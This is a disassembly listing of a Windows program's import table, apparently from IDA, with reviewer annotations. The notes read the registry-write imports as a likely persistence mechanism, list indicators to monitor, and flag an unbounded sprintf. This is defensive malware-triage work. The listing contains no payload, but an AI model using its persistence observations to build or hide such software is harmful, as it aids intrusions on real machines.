.idata:00405238 ; int __stdcall __imp_GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)
.idata:00405238 extrn __imp_GetDateFormatA:dword
.idata:00405238 ; DATA XREF: GetDateFormatA^r
.idata:0040523C ; DWORD _imp_GetLastError(void)
.idata:0040523C extrn __imp_GetLastError:dword ; DATA XREF: GetLastError^r
.idata:00405240 ; DWORD __stdcall __imp_GetModuleFileNameA(HMODULE hModule,LPSTR lpFilename,DWORD nSize)
.idata:00405240 extrn __imp_GetModuleFileNameA:dword
.idata:00405240 ; DATA XREF: GetModuleFileNameA^r
.idata:00405244 ; HMODULE __stdcall __imp_GetModuleHandleA(LPCSTR lpModuleName)
.idata:00405244 extrn __imp_GetModuleHandleA:dword
.idata:00405244 ; DATA XREF: GetModuleHandleA^r
.idata:00405248 ; BOOL __stdcall __imp_CloseHandle(HANDLE hObject)
.idata:00405248 extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle^r
.idata:0040524C ; DWORD _imp_GetTickCount(void)
.idata:0040524C extrn __imp_GetTickCount:dword ; DATA XREF: GetTickCount^r
.idata:00405250 ; void __stdcall __imp_RtlUnwind(PVOID TargetFrame,PVOID TargetIp,PEXCEPTION_RECORD ExceptionRecord,PVOID ReturnValue)
.idata:00405250 ; (prototype added by review - IDA had no type info for this slot)
.idata:00405250 extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind^r
.idata:00405254 ; HANDLE __stdcall __imp_CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
.idata:00405254 extrn __imp_CreateMutexA:dword ; DATA XREF: CreateMutexA^r
.idata:00405258 ; void __stdcall __imp_Sleep(DWORD dwMilliseconds)
.idata:00405258 extrn __imp_Sleep:dword ; DATA XREF: Sleep^r
.idata:0040525C ; BOOL __stdcall __imp_TerminateThread(HANDLE hThread,DWORD dwExitCode)
.idata:0040525C extrn __imp_TerminateThread:dword
.idata:0040525C ; DATA XREF: TerminateThread^r
.idata:00405260 ; HANDLE __stdcall __imp_CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,DWORD dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
.idata:00405260 extrn __imp_CreateThread:dword ; DATA XREF: CreateThread^r
.idata:00405264
.idata:00405268
.idata:0040526C ;
.idata:0040526C ; Imports from ADVAPI32.DLL
.idata:0040526C ;
.idata:0040526C ; ---------------------------------------------------------------------------
.idata:0040526C ; ADVAPI32 IAT. Only RegCreateKeyExA / RegSetValueExA / RegCloseKey are
.idata:0040526C ; imported - a create-and-write pattern with no RegOpenKey*/RegQueryValue*,
.idata:0040526C ; i.e. through the static IAT this module writes the registry but never
.idata:0040526C ; reads it. A registry write from a network-active process is the classic
.idata:0040526C ; persistence step (e.g. an autorun key - confirm); the key path and value
.idata:0040526C ; name passed at the RegCreateKeyExA / RegSetValueExA callers are the host
.idata:0040526C ; indicators to monitor and to clean up.
.idata:0040526C ; ---------------------------------------------------------------------------
.idata:0040526C ; LONG __stdcall __imp_RegCloseKey(HKEY hKey)
.idata:0040526C extrn __imp_RegCloseKey:dword ; DATA XREF: RegCloseKey^r
.idata:00405270 ; LONG __stdcall __imp_RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
.idata:00405270 extrn __imp_RegCreateKeyExA:dword
.idata:00405270 ; DATA XREF: RegCreateKeyExA^r
.idata:00405274 ; LONG __stdcall __imp_RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
.idata:00405274 extrn __imp_RegSetValueExA:dword
.idata:00405274 ; DATA XREF: RegSetValueExA^r
.idata:00405278
.idata:0040527C
.idata:00405280 ;
.idata:00405280 ; Imports from CRTDLL.DLL
.idata:00405280 ;
.idata:00405280 ; ---------------------------------------------------------------------------
.idata:00405280 ; CRTDLL IAT. The C runtime is CRTDLL.DLL (not MSVCRT); __GetMainArgs is the
.idata:00405280 ; CRTDLL startup helper that MinGW-style crt code calls, which suggests a
.idata:00405280 ; GCC/MinGW build - confirm. Review notes (hedged; confirm at XREF callers):
.idata:00405280 ; - rand/srand: a PRNG is used; the consumer of rand() is worth locating.
.idata:00405280 ; - fopen/fread/fclose: the module reads at least one file.
.idata:00405280 ; - strtok/strchr/atoi next to the KERNEL32 GetCommandLineA import is
.idata:00405280 ;   consistent with command-line parsing.
.idata:00405280 ; - sprintf has no length bound; check destination buffer sizes at callers.
.idata:00405280 ; - signal/raise: CRT signal handling.
.idata:00405280 ; Prototypes marked "(added by review)" were missing from IDA's type info.
.idata:00405280 ; ---------------------------------------------------------------------------
.idata:00405280 ; void __cdecl _imp___GetMainArgs(int *argc,char ***argv,char ***envp,int glob) (added by review; per MinGW crt1 usage - confirm)
.idata:00405280 extrn __imp___GetMainArgs:dword ; DATA XREF: __GetMainArgs^r
.idata:00405284 ; int __cdecl _imp_atoi(const char *)
.idata:00405284 extrn __imp_atoi:dword ; DATA XREF: atoi^r
.idata:00405288 ; void __cdecl _imp_exit(int)
.idata:00405288 extrn __imp_exit:dword ; DATA XREF: exit^r
.idata:0040528C ; int __cdecl _imp_fclose(FILE *) (added by review)
.idata:0040528C extrn __imp_fclose:dword ; DATA XREF: fclose^r
.idata:00405290 ; FILE *__cdecl _imp_fopen(const char *,const char *) (added by review)
.idata:00405290 extrn __imp_fopen:dword ; DATA XREF: fopen^r
.idata:00405294 ; size_t __cdecl _imp_fread(void *,size_t,size_t,FILE *) (added by review)
.idata:00405294 extrn __imp_fread:dword ; DATA XREF: fread^r
.idata:00405298 ; void *__cdecl _imp_memcpy(void *,const void *,size_t)
.idata:00405298 extrn __imp_memcpy:dword ; DATA XREF: memcpy^r
.idata:0040529C ; void *__cdecl _imp_memset(void *,int,size_t)
.idata:0040529C extrn __imp_memset:dword ; DATA XREF: memset^r
.idata:004052A0 ; int __cdecl _imp_raise(int) (added by review)
.idata:004052A0 extrn __imp_raise:dword ; DATA XREF: raise^r
.idata:004052A4 ; int _imp_rand(void)
.idata:004052A4 extrn __imp_rand:dword ; DATA XREF: rand^r
.idata:004052A8 ; void (__cdecl *_imp_signal(int,void (__cdecl *)(int)))(int) (added by review)
.idata:004052A8 extrn __imp_signal:dword ; DATA XREF: signal^r
.idata:004052AC ; int __cdecl _imp_sprintf(char *,const char *,...) (added by review; unbounded write)
.idata:004052AC extrn __imp_sprintf:dword ; DATA XREF: sprintf^r
.idata:004052B0 ; void __cdecl _imp_srand(unsigned int)
.idata:004052B0 extrn __imp_srand:dword ; DATA XREF: srand^r
.idata:004052B4 ; char *__cdecl _imp_strchr(const char *,int)
.idata:004052B4 extrn __imp_strchr:dword ; DATA XREF: strchr^r
.idata:004052B8 ; char *__cdecl _imp_strtok(char *,const char *)
.idata:004052B8 extrn __imp_strtok:dword ; DATA XREF: strtok^r
.idata:004052BC
.idata:004052BC
.idata:004052BC
.idata:004052BC end start ; end of module; MASM `end <label>` names `start` as the program entry point